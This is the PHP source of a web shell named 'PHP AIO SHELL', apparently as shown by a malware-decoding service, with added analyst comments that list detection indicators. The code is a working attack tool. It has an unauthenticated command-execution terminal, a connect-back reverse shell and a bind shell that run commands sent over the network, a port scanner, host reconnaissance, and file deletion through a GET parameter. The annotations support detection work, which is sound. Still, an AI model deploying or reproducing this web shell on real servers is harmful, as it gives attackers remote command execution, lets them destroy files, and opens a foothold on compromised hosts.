function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
		'21'=>'FTP',
		'22'=>'SSH',
		'23'=>'Telnet',
		'25'=>'SMTP',
		'79'=>'Finger',
		'80'=>'HTTP',
		'81'=>'HTTP/Proxy',
		'110'=>'POP3',
		'135'=>'MS Netbios',
		'139'=>'MS Netbios',
		'143'=>'IMAP',
		'162'=>'SNMP',
		'389'=>'LDAP',
		'443'=>'HTTPS',
		'445'=>'MS SMB',
		'873'=>'rsync',
		'1080'=>'Proxy/HTTP Server',
		'1433'=>'MS SQL Server',
		'2433'=>'MS SQL Server Hidden',
		'1521'=>'Oracle DB Server',
		'1522'=>'Oracle DB Server',
		'3128'=>'Squid Cache Server',
		'3129'=>'Squid Cache Server',
		'3306'=>'MySQL Server',
		'3307'=>'MySQL Server',
		'3500'=>'Squid Cache Server',
		'3389'=>'MS Terminal Service',
		'5800'=>'VNC Server',
		'5900'=>'VNC Server',
		'8080'=>'Proxy/HTTP Server',
		'10000'=>'Webmin',
		'11211'=>'Memcached'
		);

	echo '<table>';
		
	foreach($general_ports as $port=>$name) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				// Waits for the service to send first; a silent service
				// holds this read until the stream's own timeout.
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					</tr>';
			}
			fclose($fp);
		}
	} 
	echo '</table>';
}

/**
 * Probe every port in an inclusive range on one host and print a table row
 * for each port that accepts a TCP connection.
 *
 * @host     - target host, taken from the request by run_portscan().
 * @src_port - first port of the range.
 * @dst_port - last port of the range.
 * @timeout  - per-port connect timeout in seconds.
 * @banner   - when non-empty, the "State" column holds up to 127 bytes read
 *             from the port instead of the word OPEN.
 *
 * Returns nothing. The scan is sequential and runs inside the HTTP request,
 * so a wide range keeps the request (and a PHP worker) busy for its whole
 * duration. $host and banner text are emitted without HTML encoding.
 */
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
	echo '<table>
		<tr>
		<td>Host</td>
		<td>Port</td>
		<td>State</td>
		</tr>';

        for ($port = $src_port; $port <= $dst_port; $port++) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>OPEN</td>
					</tr>';
			}
			fclose($fp);
		}
        }
	echo '</table>';
}


/**
 * Handler for `cmd=portscan`: print the scan form and, when a host is
 * posted, run either the fixed-list scan or a scan of ports 1 to 65535.
 *
 * Reads $_POST['scan_host'], ['scan_timeout'], ['scan_fast'] and
 * ['scan_banner']; none of them is validated.
 *
 * Returns -1 when no host is posted; otherwise nothing.
 *
 * Analyst note: the four POST field names and `cmd=portscan` identify this
 * feature in request logs; the form pre-fills the host with 127.0.0.1.
 */
function run_portscan()
{
	echo '<html>
		<head>
		<style>
		tr.directory
		{
		font-size:14px;
		text-align:left;
		height:20px;
		border:1px solid #98bf21;
		padding:2px 6px 2px 6px;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		target host
		<input type="text" name="scan_host" value="127.0.0.1" />
		timeout
		<input type="text" name="scan_timeout" value="5" />
		general ports
		<input type="checkbox" name="scan_fast" />
		banner
		<input type="checkbox" name="scan_banner" />
		<input type="submit" value="scan" />
		</form>
		</body>
		</html>';

	if (empty($_POST['scan_host']))
		return -1;
	
	// An unticked checkbox is absent from the POST data, so
	// $_POST['scan_banner'] is read below even when it is not set.
	if (isset($_POST['scan_fast'])) {
		port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
	else {
		port_scan($_POST['scan_host'], "1", "65535", 
				$_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
}

/**
 * Run a command through popen() and write its standard output to a socket.
 *
 * @socket - connected socket that receives the output.
 * @cmd    - command string; connect_backdoor() and bindshell() pass bytes
 *           read from the network here unchanged.
 *
 * Returns 0 when the output has been sent, -1 if a socket write fails.
 *
 * Analyst note: popen() starts the command through the system shell, so each
 * call appears as a shell child of the web server / PHP worker process —
 * the process-tree relationship that host monitoring can alert on.
 */
function linux_exec($socket, $cmd)
{
        // The popen() result is not checked before it is read.
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $ret = socket_write($socket, $buf, strlen($buf));
                if ($ret == false) {
                        // Returns without pclose(), leaving the pipe open.
                        return -1;
                }
        }

        pclose($handle);
        return 0;
}

/**
 * Connect out to a remote host, announce itself, then execute whatever the
 * remote side sends and return the output over the same connection.
 *
 * @host - remote address, taken from $_POST['target_host'] by run_backdoor().
 * @port - remote port, taken from $_POST['target_port'].
 *
 * Returns -1 if the connection or the first write fails; otherwise it does
 * not return.
 *
 * Analyst note: the clear-text string "connect back from phpshell" is the
 * first data sent on the connection and is usable as a network signature.
 * The connection is outbound from the web server, so egress filtering on
 * that host is the relevant network control.
 */
function connect_backdoor($host, $port)
{
        $banner = "connect back from phpshell\n";

        $socket = tcp_connect($host, $port);
        if ($socket == -1) {
		echo "connect to $host:$port failed.\n";
                return -1;
	}
	echo "connect to $host:$port ok.\n";

        $ret = socket_write($socket, $banner, strlen($banner));
        if ($ret == false) {
		echo "write data failed.\n";
                socket_close($socket);
                return -1;
        }

        // No exit condition: the result of socket_read() is not checked, so
        // the loop keeps running after the peer has gone, and the PHP worker
        // stays occupied until it is terminated from outside this function.
        while (true) {
                $buf = socket_read($socket, 1024);
                echo $buf;
                linux_exec($socket, $buf);
        }
}

/**
 * Listen on a local TCP port, accept one client, announce itself, then
 * execute whatever that client sends and return the output to it.
 *
 * @local_port - port to listen on, taken from $_POST['bind_port'] by
 *               run_backdoor().
 *
 * Returns -1 if socket setup or the first write fails; otherwise it does
 * not return.
 *
 * Analyst note: the host-side artefacts are a listening socket owned by the
 * web server / PHP worker process and the clear-text string
 * "bindshell from phpshell" sent to the client on connect. No credential or
 * source-address check is applied to the accepted client.
 */
function bindshell($local_port)
{
        $banner = "bindshell from phpshell\n";

        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.\n";
                return -1;
        }

        // Bind address is the literal '0' — presumably all interfaces;
        // confirm on the target platform.
        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.\n";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.\n";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.\n";

        // Only the first successful accept is served.
        while (true) {
                if (($newsock = socket_accept($socket)) !== false) {
                        socket_getpeername($newsock, $ip);
                        echo "got a client form $ip"."<br />";
                        break;
                }
        }

        $ret = socket_write($newsock, $banner, strlen($banner));
        if ($ret == false) {
                echo "write data failed.\n";
                socket_close($newsock);
                socket_close($socket);
                return -1;
        }

        // No exit condition: the result of socket_read() is not checked.
        while (true) {
                $buf = socket_read($newsock, 1024);
                echo $buf;
                linux_exec($newsock, $buf);
        }

	// Unreachable: the loop above never breaks.
	socket_close($newsock);
	socket_close($socket);
	return 0;
}

/**
 * Handler for `cmd=backdoor`: print the two backdoor forms and start the
 * mode whose fields were posted.
 *
 * Reads $_POST['target_host'] and ['target_port'] (connect-back mode) and
 * $_POST['bind_port'] (listening mode); none of them is validated.
 *
 * Analyst note: these POST field names, with `cmd=backdoor` in the query
 * string, identify use of this feature in request logs. Because both modes
 * loop without returning, the triggering HTTP request does not complete
 * normally — a long-running or timed-out request to this script is a
 * further indicator.
 */
function run_backdoor()
{
        echo '<html><head><style>
		h3.banner
		{
		text-align:center;
		color:#384850;
		font-weight:bold;
		}
		form
		{
		text-align:center;
		}
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
		</head></style>
                <h3 class="banner" >Linux connect backdoor</h3>
                <form action="" method="post">
                Target host
                <input type="text" name="target_host" />
                Target port
                <input type="text" name="target_port" />
                <input type="submit" value="Connect" />
                </form>
		</br />
                <h3 class="banner" >Linux bindshell backdoor</h3>
                <form action="" method="post">
		Bind port
                <input type="text" name="bind_port" />
                <input type="submit" value="Bindshell" />
                </form>
		</html>';

        // The keys are read without isset(), so a plain GET of this page
        // raises undefined-index notices under error_reporting(E_ALL).
        if ($_POST['target_host'] && $_POST['target_port']) {
                connect_backdoor($_POST['target_host'], $_POST['target_port']);
        }
	if ($_POST['bind_port']) {
		bindshell($_POST['bind_port']);
	}
}

/*
function exec_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
		echo $buf;
        }

        pclose($handle);
        return 0;
}

function run_shell()
{
	$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);

	echo '<html>
		<head>
		<style>
                input[type=text]
                {
                width:1130px;
                color:#384850;
                background-color:#ffffff;
                }
		textarea
		{
                width:1130px;
                color:#384850;
                background-color:#ffffff;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
		<input style="border:none" color="#384850" type="text" name="shellcmd" />
		<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
		<textarea name="textarea" cols="150" rows="30" readonly>';

	if ($_POST['shellcmd']) {
		//echo $user_info['name'].'@'.$host_name.'$';
		//echo $_POST['shellcmd'];
		exec_shell($_POST['shellcmd']);
		echo '</textarea></form></body></html>';
	}
}
*/

/**
 * Run a command through popen() and return its standard output as a string.
 *
 * @cmd - command string; aio_shell() passes $_POST['shellcmd'] unchanged.
 *
 * Returns the collected output. $data is never initialised, so a command
 * that prints nothing makes the function return an undefined variable.
 *
 * Analyst note: popen() starts the command through the system shell, so each
 * call appears as a shell child of the web server / PHP worker process.
 */
function run_terminal_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $data .= $buf."";
        }

        pclose($handle);
        return $data;
}

/**
 * Handler for `cmd=shell`: render a terminal-style page and execute the
 * posted command.
 *
 * Reads $_POST['shellcmd'], runs it through run_terminal_shell(), appends
 * the prompt, the command and its output to $_SESSION['output'], and prints
 * the accumulated transcript into a textarea.
 *
 * Analyst note: there is no authentication, allow-list or escaping between
 * the request and command execution. Indicators present in this function:
 * the POST field `shellcmd`, the page title cell "TERMINAL", and the static
 * footer string "wzt 2014 http://www.cloud-sec.org", which is usable as a
 * content signature when scanning web roots. The transcript stored in the
 * session may remain in the server's session store as evidence of the
 * commands that were run.
 */
function aio_shell()
{
        // gethostbyaddr() is given SERVER_NAME, which may be a host name
        // rather than an IP address.
        $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);
	$curr_path = getcwd();
	$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;

        echo '<html>
        <head>
        <style>
        tr.banner
        {
        font-size: 18px;
        font-style:italic;
        color:#ffffff;
        background-color: #285070;
        }
        tr.prompt
        {
        font-size: 14px;
        color:#285800;
        background-color: #000000;
        }
        textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
        input
        {
        color: #285800; background-color: #000000;
        }
        </style>
        <script type="text/javascript" language="JavaScript">
        function init()
        {
                document.shell.output.scrollTop = document.shell.output.scrollHeight;
        }
        </script>
        </head>
        <body onload="init()">
        <table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
        <tr class="banner">
                <td width="10%"><b>TERMINAL</b></td>
                <td align="center">'.$prompt.'</td>
        </tr>

        <form name="shell" action="" method="post">
        <tr class="prompt">
        <td colspan="2" nowrap>
        <textarea name="output" rows="20" cols="90">';
        // The key is read without isset(); command output and the stored
        // transcript are printed without HTML encoding.
        if ($_POST['shellcmd']) {
                $cmd_data = $prompt.'$'.$_POST['shellcmd']."\n";
                $cmd_data .= run_terminal_shell($_POST['shellcmd']);
                $_SESSION['output'] .= $cmd_data;
                echo $_SESSION['output'];
        }

        echo '</textarea><br />'.$prompt.'$'.'
        <input style="border:none" type="text" name="shellcmd" />
        <input style="border:none" type="submit" value="" />
</td>
</tr>
</form>

<tr class="banner">
        <td align="center" height="20" colspan="2"> &copy wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';

}

/**
 * Alternative dispatcher: route `cmd` to the backdoor, shell, port-scan or
 * proxy handler, or print a plain menu when `cmd` is absent.
 *
 * The script's visible entry point calls aio_main(), not this function, so
 * this appears to be a leftover from an earlier version. Its menu links to
 * `cmd=showdir`, for which no branch exists here.
 */
function webshell_main()
{
	if (isset($_GET['cmd'])) {
		if ($_GET['cmd'] == "backdoor") {
			run_backdoor();
		}
		if ($_GET['cmd'] == "shell") {
			aio_shell();
		}
		if ($_GET['cmd'] == "portscan") {
			run_portscan();
		}
		if ($_GET['cmd'] == "proxy") {
			web_proxy_client();
		}
	}
	else {
		echo '<html>
		<body>
		<table border="0" cellpadding="10"  cellspacing="20">
		<tr>
		<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
		<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
		<td><a href="webshell.php?cmd=portscan">port scan</a></td>
		<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
		<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
		</tr>
		</body>
		</html>';
	}
}

/**
 * Analyst note: main page and request router of the sample ("PHP AIO SHELL").
 *
 * On every call it:
 *  1. Collects host reconnaissance data: process uid and its passwd entry
 *     (posix_getuid / posix_getpwuid), kernel and host identification
 *     (posix_uname), server name, port and software from $_SERVER, PHP and
 *     Zend versions, the `disable_functions` setting, the `safe_mode` ini
 *     value, the working directory, and total/free space of "/".
 *  2. Prints an HTML page containing those values and a menu of links to
 *     `webshell.php?cmd=...`.
 *  3. Dispatches on `$_GET['cmd']` and then on `$_GET['delete']` and
 *     `$_GET['edit']`.
 *
 * Observations useful for triage and detection:
 *  - No authentication or authorisation check is visible in this function;
 *    the request parameters are acted on directly.
 *  - `$_GET['delete']` is handed unchanged to delete_file(), which (as defined
 *    at the top of the file) calls unlink() on the given path, so any file the
 *    web server account may remove is reachable through a GET request.
 *  - `$_GET['edit']` is handed to edit_file(), which reduces the path with
 *    basename() before opening it.
 *  - All collected values are concatenated into the HTML without escaping.
 *  - The menu lists `cmd=crack` and `cmd=mysql`, but no branch in this
 *    function handles those values.
 *  - Handler output is emitted after the closing `</html>` of the banner page.
 *  - `$_GET['cmd']`, `$_GET['delete']` and `$_GET['edit']` are read without
 *    isset(); with error_reporting(E_ALL) set at the top of the file, absent
 *    parameters raise notices/warnings in the response or error log.
 *  - Stable strings for content scanning and log review: "PHP AIO SHELL",
 *    `webshell.php?cmd=`, and the `delete=` / `edit=` query parameters.
 *
 * @return void
 */
function aio_main()
{
	// Identity of the account the PHP process runs as.
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	// Note: the text in parentheses after gid is the user name from the passwd
	// entry, not a looked-up group name.
	$uid_banner="uid=".$uid."(".$user_info['name'].") ".
                	"gid=".$user_info['gid']."(".$user_info['name'].") ".
                	"dir=".$user_info['dir']." ".
                	"shell=".$user_info['shell'];

	// Kernel / host identification, equivalent in content to `uname -a`.
	$uname = posix_uname();

	$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
                	$uname['version']." ".$uname['machine'];

	$server_addr=$_SERVER['SERVER_NAME'];
	$server_port= $_SERVER['SERVER_PORT'];

	// "h" is the 12-hour clock and no am/pm marker is included in the format.
	$server_time=date("Y/m/d h:i:s",time());
	$phpsoft=$_SERVER['SERVER_SOFTWARE'];
	$php_version=PHP_VERSION;
	$zend_version=zend_version();
	// Lists which PHP functions the host has disabled.
	$dis_func=get_cfg_var("disable_functions");
	$safemode=@ini_get('safe_mode');
	// NOTE(review): the label looks inverted - a false/empty ini value is
	// displayed as "On"; any other value is displayed as returned by ini_get().
	if ($safemode == false)
		$safemode="On";
	$cwd_path=getcwd();
	// Disk figures are for the filesystem mounted at "/", truncated to whole GiB.
	$total_disk=disk_total_space("/");
	$total_disk_gb=intval($total_disk/(1024*1024*1024));
	$free_disk=disk_free_space("/");
	$free_disk_gb=intval($free_disk/(1024*1024*1024));
// Banner page: inline CSS, the collected host details, and the command menu.
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}

ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}

ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}

li
{
display:inline;
}

a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}

h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}

table.banner
{
font-size:14px;
}

tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}

tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}

p.banner
{
font-size:14px;
}

</style>
</head>

<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />

<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
 | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>

<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />

<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />

</body>
</html>';

	// Command dispatch. The handlers are defined elsewhere in the file; the
	// comparison is loose (==) and only these five literals are handled.
        if ($_GET['cmd']) {
		if ($_GET['cmd'] == "dir") {
			aio_directory();
		}
                if ($_GET['cmd'] == "backdoor") {
                        run_backdoor();
                }
                if ($_GET['cmd'] == "shell") {
                        aio_shell();
                }
                if ($_GET['cmd'] == "portscan") {
                        run_portscan();
                }
                if ($_GET['cmd'] == "proxy") {
                        web_proxy_client();
                }
        }

	// File actions are driven by separate query parameters and run in
	// addition to any `cmd` handled above. The request-supplied value is
	// passed through without validation in this function.
	if ($_GET['delete']) {
		delete_file($_GET['delete']);	
	}
	if ($_GET['edit']) {
		edit_file($_GET['edit']);
	}
}

// Analyst note: unconditional entry point - every request that reaches this
// file runs aio_main(); no access check is visible at this call site.
aio_main();
?>

Function Calls

aio_main 1
posix_getuid 1
session_start 1
error_reporting 1

Variables

None

Stats

MD5 29836a2f5e2362706dd3d219a8db5a8f
Eval Count 0
Decode Time 234 ms